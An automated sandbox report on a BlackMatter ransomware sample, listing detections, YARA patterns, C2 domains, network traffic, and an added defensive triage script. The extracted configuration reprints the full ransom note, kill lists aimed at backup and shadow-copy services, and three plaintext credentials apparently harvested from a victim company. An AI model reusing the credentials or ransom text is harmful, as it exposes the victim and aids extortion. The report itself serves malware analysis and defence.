Windows Analysis Report GlLHM7paoZ.exe

Overview

General Information

Sample Name: GlLHM7paoZ.exe
Analysis ID: 508200
MD5: 598c53bfef81e489375f09792e487f1a
SHA1: 80a29bd2c349a8588edf42653ed739054f9a10f5
SHA256: 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6

Detection

BLACKMatter
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Found ransom note / readme
Antivirus / Scanner detection for submitted sample
Yara detected BLACKMatter Ransomware
Multi AV Scanner detection for domain / URL
Hides threads from debuggers
Changes the wallpaper picture
Found Tor onion address
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Contains functionality to read the PEB
Enables security privileges

Classification

Process Tree

  • System is w10x64
  • GlLHM7paoZ.exe (PID: 4540 cmdline: 'C:\Users\user\Desktop\GlLHM7paoZ.exe' MD5: 598C53BFEF81E489375F09792E487F1A)
  • cleanup

Malware Configuration

Threatname: BLACKMatter

{
  "Version": "1.2",
  "RSA Key": "8719a830f4ba94949291582b6654f96c96d9a0f4419f52f367cf2e19b9c95a9b7091cbefafbe5ae39dae285894590a8db8b764e572fab5234646f8659ada2fbd8c37bfddd60797a5ad9dad2ded37969d179ea4ad4c1980d0e70b056241d325e18beb5cc4925fa56abf810f916e7932d016a86e3ad97749e75f9031114b060b56",
  "Company Victim ID": "512478c08dada2af19e49808fbda5b0b",
  "AES key": "a6f330b09cd47b4fb9214f7836aa46ad",
  "ODD_CRYPT_LARGE_FILES": false,
  "NEED_MAKE_LOGON": true,
  "MOUNT_UNITS_AND_CRYPT": true,
  "CRYPT_NETWORK_RESOURCES_AND_AD": true,
  "TERMINATE_PROCESSES": true,
  "STOP_SERVICES_AND_DELETE": true,
  "CREATE_MUTEX": true,
  "PREPARE_VICTIM_DATA_AND_SEND": true,
  "PROCESS_TO_KILL": ["encsvc", "thebat", "mydesktopqos", "xfssvccon", "firefox", "infopath", "winword", "steam", "synctime", "notepad", "ocomm", "onenote", "mspub", "thunderbird", "agntsvc", "sql", "excel", "powerpnt", "outlook", "wordpad", "dbeng50", "isqlplussvc", "sqbcoreservice", "oracle", "ocautoupds", "dbsnmp", "msaccess", "tbirdconfig", "ocssd", "mydesktopservice", "visio"],
  "SERVICES_TO_KILL": ["mepocs", "memtas", "veeam", "svc$", "backup", "sql", "vss"],
  "C2_URLS": ["https://paymenthacks.com", "http://paymenthacks.com", "https://mojobiden.com", "http://mojobiden.com"],
  "LOGON_USERS_INFORMATION": ["aheisler@hhcp.com:120Heisler", "dsmith@hhcp.com:Tesla2019", "administrator@hhcp.com:iteam8**"],
  "RANSOM_NOTE": "      ~+                                       \r\n               *       +\r\n         '     BLACK        |\r\n     ()    .-.,='``'=.    - o -         \r\n           '=/_       \\     |           \r\n        *   |  '=._    |                \r\n             \\     `=./`,        '    \r\n          .   '=.__.=' `='      *\r\n +             Matter        +\r\n      O      *        '       .\r\n\r\n>>> What happens?\r\n   Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver.\r\n   We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.\r\n\r\n>>> What guarantees? \r\n   We are not a politically motivated group and we do not need anything other than your money. \r\n   If you pay, we will provide you the programs for decryption and we will delete your data. \r\n   If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. \r\n   We always keep our promises.\r\n\r\n>> Data leak includes\r\n1. Full emloyeers personal data\r\n2. Network information\r\n3. Schemes of buildings, active project information, architect details and contracts, \r\n4. Finance info\r\n\r\n\r\n>>> How to contact with us? \r\n   1. Download and install TOR Browser (https://www.torproject.org/).\r\n   2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.\r\n  \r\n>>> Warning! Recovery recommendations.  \r\n   We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them."
}
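The configuration above is the most actionable part of the report: the kill lists say what the sample stops before encrypting, the boolean flags say which capabilities the affiliate enabled (NEED_MAKE_LOGON together with three embedded domain credentials means the builder was given harvested accounts to reach network resources and AD), and C2_URLS gives the beacon domains. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it loads the relevant fields, derives the IOCs, and checks a constructed process and service inventory against the kill lists. Case-insensitive substring matching is an assumption about how the sample applies the lists (consistent with entries such as "sql" and "backup"); the report does not state the comparison rule. The embedded credentials are represented only by their count.

```python
"""Derive hunting checks from the BlackMatter configuration above.

Added example, not code from the Joe Sandbox report or from the sample.
Configuration values are copied from the report; the process/service
inventories are constructed sample input. Substring matching is an
assumption about how the sample applies PROCESS_TO_KILL and
SERVICES_TO_KILL (the report does not document the comparison).
"""
from urllib.parse import urlparse

# Fields of interest from the extracted configuration (report values).
CONFIG = {
    "Version": "1.2",
    "Company Victim ID": "512478c08dada2af19e49808fbda5b0b",
    "ODD_CRYPT_LARGE_FILES": False,
    "NEED_MAKE_LOGON": True,
    "MOUNT_UNITS_AND_CRYPT": True,
    "CRYPT_NETWORK_RESOURCES_AND_AD": True,
    "TERMINATE_PROCESSES": True,
    "STOP_SERVICES_AND_DELETE": True,
    "CREATE_MUTEX": True,
    "PREPARE_VICTIM_DATA_AND_SEND": True,
    "PROCESS_TO_KILL": [
        "encsvc", "thebat", "mydesktopqos", "xfssvccon", "firefox", "infopath",
        "winword", "steam", "synctime", "notepad", "ocomm", "onenote", "mspub",
        "thunderbird", "agntsvc", "sql", "excel", "powerpnt", "outlook",
        "wordpad", "dbeng50", "isqlplussvc", "sqbcoreservice", "oracle",
        "ocautoupds", "dbsnmp", "msaccess", "tbirdconfig", "ocssd",
        "mydesktopservice", "visio",
    ],
    "SERVICES_TO_KILL": ["mepocs", "memtas", "veeam", "svc$", "backup", "sql", "vss"],
    "C2_URLS": [
        "https://paymenthacks.com", "http://paymenthacks.com",
        "https://mojobiden.com", "http://mojobiden.com",
    ],
    # Three credential pairs are embedded in the real config; only the
    # count matters for triage, so the secrets are not repeated here.
    "LOGON_USERS_INFORMATION_COUNT": 3,
}

# Constructed inventory of a hypothetical host (not from the report).
SAMPLE_PROCESSES = ["explorer.exe", "sqlservr.exe", "EXCEL.EXE", "notepad.exe",
                    "MsMpEng.exe", "chrome.exe", "outlook.exe"]
SAMPLE_SERVICES = ["wuauserv", "MSSQLSERVER", "VeeamBackupSvc", "VSS", "Spooler"]


def enabled_capabilities(config):
    """Names of the boolean feature flags the affiliate turned on."""
    return sorted(k for k, v in config.items() if v is True)


def c2_domains(config):
    """Hostnames to block or alert on, de-duplicated across http/https."""
    return sorted({urlparse(u).hostname for u in config["C2_URLS"]})


def _first_match(name, patterns):
    # Assumed semantics: case-insensitive substring, first pattern wins.
    lowered = name.lower()
    for pat in patterns:
        if pat.lower() in lowered:
            return pat
    return None


def processes_targeted(running, config):
    """(process, kill-list entry) for every process the sample would terminate."""
    hits = []
    for proc in running:
        pat = _first_match(proc, config["PROCESS_TO_KILL"])
        if pat:
            hits.append((proc, pat))
    return hits


def services_targeted(services, config):
    """(service, kill-list entry) for services it would stop and delete."""
    hits = []
    for svc in services:
        pat = _first_match(svc, config["SERVICES_TO_KILL"])
        if pat:
            hits.append((svc, pat))
    return hits


def triage(config, running, services):
    """One dictionary an analyst can paste into an incident ticket."""
    return {
        "victim_id": config["Company Victim ID"],
        "capabilities": enabled_capabilities(config),
        "embedded_credentials": config["LOGON_USERS_INFORMATION_COUNT"],
        "c2_domains": c2_domains(config),
        "processes_targeted": processes_targeted(running, config),
        "services_targeted": services_targeted(services, config),
    }


if __name__ == "__main__":
    for key, value in triage(CONFIG, SAMPLE_PROCESSES, SAMPLE_SERVICES).items():
        print(f"{key}: {value}")
```

Because the lists are matched as substrings, a single entry such as "sql" covers sqlservr.exe, MSSQLSERVER and isqlplussvc at once; run the same inventory check against a backup server's service list before an incident to see which services would be silently stopped.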

Yara Overview

Initial Sample

Source: GlLHM7paoZ.exe | Rule: RAN_BlackMatter_Aug_2021_1 | Description: Detect BlackMatter ransomware | Author: Arkbird_SOLG
  • 0xb83b:$s1: 55 8B EC 81 EC AC 02 00 00 53 51 52 56 57 C7 45 FC 00 00 00 00 C7 45 F4 00 00 00 00 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 6A 00 FF 15 00 15 41 00 85 C0 0F 85 3E 04 00 00 8D 45 D4 50 6A 00 ...
  • 0xbabf:$s2: 8D 45 88 C7 00 A1 5F 42 22 C7 40 04 AC 5F 56 22 C7 40 08 D7 5F 29 22 C7 40 0C C2 5F 45 22 C7 40 10 A3 5F 3B 22 C7 40 14 AE 5F 69 22 C7 40 18 80 5F 76 22 C7 40 1C 98 5F 72 22 C7 40 20 88 5F 74 ...
  • 0x61b3:$s3: 8D 45 B4 C7 00 21 0A 83 E9 C7 40 04 C5 CE D7 33 C7 40 08 40 C4 06 E2 C7 40 0C A2 87 FB DD B9 04 00 00 00 81 30 ED 5F 06 22 83 C0 04 49 75 F4 8D 45 A4 C7 00 6A F9 14 FE C7 40 04 92 2C C9 33 C7 ...
  • 0x6dc:$s4: 8D BD FC FE FF FF 32 C0 AA B9 2A 00 00 00 B0 FF F3 AA B0 3E AA B9 03 00 00 00 B0 FF F3 AA B0 3F AA B9 0A 00 00 00 B0 34 AA FE C0 E2 FB B9 03 00 00 00 B0 FF F3 AA 32 C0 AA B9 03 00 00 00 B0 FF ...
  • 0x108e5:$s5: 35 35 35 4F 35 58 35 22 36 35 36 3F 36 2C 37 3F 37 60 37 76 37
  • 0x10865:$s6: 3D 2B 3D 47 3D 4D 3D 60 3D 67 3D 6D 3D
  • 0x791:$s7: 8B 0E 0F B6 D1 0F B6 DD 57 8D BD FC FE FF FF 8A 04 3A 8A 24 3B C1 E9 10 83 C6 04 0F B6 D1 0F B6 CD 8A 1C 3A 8A 3C 39 5F 8A D4 8A F3 C0 E0 02 C0 EB 02 C0 E6 06 C0 E4 04 C0 EA 04 0A FE 0A C2 0A ...

Memory Dumps

Source: 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp | Rule: JoeSecurity_blackmatter | Description: Yara detected BLACKMatter Ransomware | Author: Joe Security
Source: 00000000.00000003.279421242.00000000012FC000.00000004.00000001.sdmp | Rule: JoeSecurity_blackmatter | Description: Yara detected BLACKMatter Ransomware | Author: Joe Security
Source: 00000000.00000002.359933097.00000000012FF000.00000004.00000001.sdmp | Rule: JoeSecurity_blackmatter | Description: Yara detected BLACKMatter Ransomware | Author: Joe Security
Source: Process Memory Space: GlLHM7paoZ.exe PID: 4540 | Rule: JoeSecurity_blackmatter | Description: Yara detected BLACKMatter Ransomware | Author: Joe Security

Unpacked PEs

Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack | Rule: RAN_BlackMatter_Aug_2021_1 | Description: Detect BlackMatter ransomware | Author: Arkbird_SOLG
  • 0x61b3:$s3: 8D 45 B4 C7 00 21 0A 83 E9 C7 40 04 C5 CE D7 33 C7 40 08 40 C4 06 E2 C7 40 0C A2 87 FB DD B9 04 00 00 00 81 30 ED 5F 06 22 83 C0 04 49 75 F4 8D 45 A4 C7 00 6A F9 14 FE C7 40 04 92 2C C9 33 C7 ...
  • 0x6dc:$s4: 8D BD FC FE FF FF 32 C0 AA B9 2A 00 00 00 B0 FF F3 AA B0 3E AA B9 03 00 00 00 B0 FF F3 AA B0 3F AA B9 0A 00 00 00 B0 34 AA FE C0 E2 FB B9 03 00 00 00 B0 FF F3 AA 32 C0 AA B9 03 00 00 00 B0 FF ...
  • 0x108e5:$s5: 35 35 35 4F 35 58 35 22 36 35 36 3F 36 2C 37 3F 37 60 37 76 37
  • 0x10865:$s6: 3D 2B 3D 47 3D 4D 3D 60 3D 67 3D 6D 3D
  • 0x791:$s7: 8B 0E 0F B6 D1 0F B6 DD 57 8D BD FC FE FF FF 8A 04 3A 8A 24 3B C1 E9 10 83 C6 04 0F B6 D1 0F B6 CD 8A 1C 3A 8A 3C 39 5F 8A D4 8A F3 C0 E0 02 C0 EB 02 C0 E6 06 C0 E4 04 C0 EA 04 0A FE 0A C2 0A ...
Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack | Rule: RAN_BlackMatter_Aug_2021_1 | Description: Detect BlackMatter ransomware | Author: Arkbird_SOLG
  • 0x61b3:$s3: 8D 45 B4 C7 00 21 0A 83 E9 C7 40 04 C5 CE D7 33 C7 40 08 40 C4 06 E2 C7 40 0C A2 87 FB DD B9 04 00 00 00 81 30 ED 5F 06 22 83 C0 04 49 75 F4 8D 45 A4 C7 00 6A F9 14 FE C7 40 04 92 2C C9 33 C7 ...
  • 0x6dc:$s4: 8D BD FC FE FF FF 32 C0 AA B9 2A 00 00 00 B0 FF F3 AA B0 3E AA B9 03 00 00 00 B0 FF F3 AA B0 3F AA B9 0A 00 00 00 B0 34 AA FE C0 E2 FB B9 03 00 00 00 B0 FF F3 AA 32 C0 AA B9 03 00 00 00 B0 FF ...
  • 0x108e5:$s5: 35 35 35 4F 35 58 35 22 36 35 36 3F 36 2C 37 3F 37 60 37 76 37
  • 0x10865:$s6: 3D 2B 3D 47 3D 4D 3D 60 3D 67 3D 6D 3D
  • 0x791:$s7: 8B 0E 0F B6 D1 0F B6 DD 57 8D BD FC FE FF FF 8A 04 3A 8A 24 3B C1 E9 10 83 C6 04 0F B6 D1 0F B6 CD 8A 1C 3A 8A 3C 39 5F 8A D4 8A F3 C0 E0 02 C0 EB 02 C0 E6 06 C0 E4 04 C0 EA 04 0A FE 0A C2 0A ...

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack | Malware Configuration Extractor: BLACKMatter (the full configuration is listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: GlLHM7paoZ.exe | Virustotal: Detection: 86%
Source: GlLHM7paoZ.exe | Metadefender: Detection: 77%
Source: GlLHM7paoZ.exe | ReversingLabs: Detection: 92%
Antivirus / Scanner detection for submitted sample
Source: GlLHM7paoZ.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: paymenthacks.com | Virustotal: Detection: 15%
Source: mojobiden.com | Virustotal: Detection: 14%
Source: ww25.paymenthacks.com | Virustotal: Detection: 7%
Machine Learning detection for sample
Source: GlLHM7paoZ.exe | Joe Sandbox ML: detected
Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: GlLHM7paoZ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Videos\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Searches\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Saved Games\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Recent\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Pictures\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Pictures\Camera Roll\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\OneDrive\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Music\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Links\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Favorites\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Favorites\Links\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Downloads\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\ZQIXMVQGAH\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\QNCYCDFIJJ\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\QCFWYSKMHA\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\PIVFAGEAAV\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\NWCXBPIUYI\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\LFOPODGVOH\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\JDDHMPCDUJ\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\GIGIYTFFYT\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\GAOBCVIQIJ\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\DUUDTUBZFW\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\BNAGMGSPLO\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Documents\BJZFPPWAPT\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\QNCYCDFIJJ\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\QCFWYSKMHA\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\PIVFAGEAAV\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\NWCXBPIUYI\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\LSBIHQFDVT\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\LFOPODGVOH\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\JDDHMPCDUJ\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\GIGIYTFFYT\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\GAOBCVIQIJ\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\DUUDTUBZFW\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\BNAGMGSPLO\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Desktop\BJZFPPWAPT\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\Contacts\kVuoJyeoW.README.txt
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\user\3D Objects\kVuoJyeoW.README.txt
Source: unknown | HTTPS traffic detected: 103.224.212.222:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: GlLHM7paoZ.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F5928 FindFirstFileW,LoadLibraryW,FindNextFileW,FindClose,0_2_010F5928
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010FBF33 GetFileAttributesW,SetThreadPriority,FindFirstFileExW,FindNextFileW,FindClose,0_2_010FBF33
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F6BBF FindFirstFileExW,GetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,0_2_010F6BBF
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F6A11 FindFirstFileExW,FindNextFileW,0_2_010F6A11
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F6AE4 FindFirstFileExW,FindClose,0_2_010F6AE4
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F8BB4 GetLogicalDriveStringsW,0_2_010F8BB4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033635 ET TROJAN BlackMatter CnC Domain in DNS Lookup (paymenthacks .com) 192.168.2.3:51143 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2033635 ET TROJAN BlackMatter CnC Domain in DNS Lookup (paymenthacks .com) 192.168.2.3:56009 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:59026 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:49572 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:52130 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:55102 -> 8.8.8.8:53
Found Tor onion address
Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp | String found in binary or memory: 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
Source: kVuoJyeoW.README.txt7.0.dr | String found in binary or memory: 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-AP Trellian Pty Limited AU
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp | String found in binary or memory: http://mojobiden.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=
Source: GlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.342688022.0000000001354000.00000004.00000001.sdmp | String found in binary or memory: http://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3f
Source: GlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmp | String found in binary or memory: http://paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIz
Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp | String found in binary or memory: http://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&m
Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, kVuoJyeoW.README.txt7.0.dr | String found in binary or memory: http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp | String found in binary or memory: http://ww25.paymenthacks.com/
Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359922754.00000000012F6000.00000004.00000020.sdmp | String found in binary or memory: http://ww25.paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPv
Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359922754.00000000012F6000.00000004.00000020.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmp, GlLHM7paoZ.exe, 00000000.00000003.279363599.00000000012F3000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.342654946.00000000012FE000.00000004.00000001.sdmp | String found in binary or memory: http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6
Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp | String found in binary or memory: http://ww25.paymenthacks.com/u
Source: GlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmp | String found in binary or memory: https://mojobiden.com/
Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp | String found in binary or memory: https://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3
Source: GlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmp | String found in binary or memory: https://mojobiden.com/ments
Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, kVuoJyeoW.README.txt7.0.dr | String found in binary or memory: https://www.torproject.org/).
Source: unknown | HTTP traffic detected: POST /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK HTTP/1.1; Accept: */*; Connection: keep-alive; Accept-Encoding: gzip, deflate, br; Content-Type: text/plain; User-Agent: Chrome/91.0.4472.77; Host: paymenthacks.com; Content-Length: 816; Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: paymenthacks.com
Source: global traffic | HTTP traffic detected: GET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-244d-afd2-7f2406ac953a HTTP/1.1; Accept: */*; Connection: keep-alive; Accept-Encoding: gzip, deflate, br; User-Agent: Chrome/91.0.4472.77; Cache-Control: no-cache; Host: ww25.paymenthacks.com; Cookie: __tad=1635060084.7055840
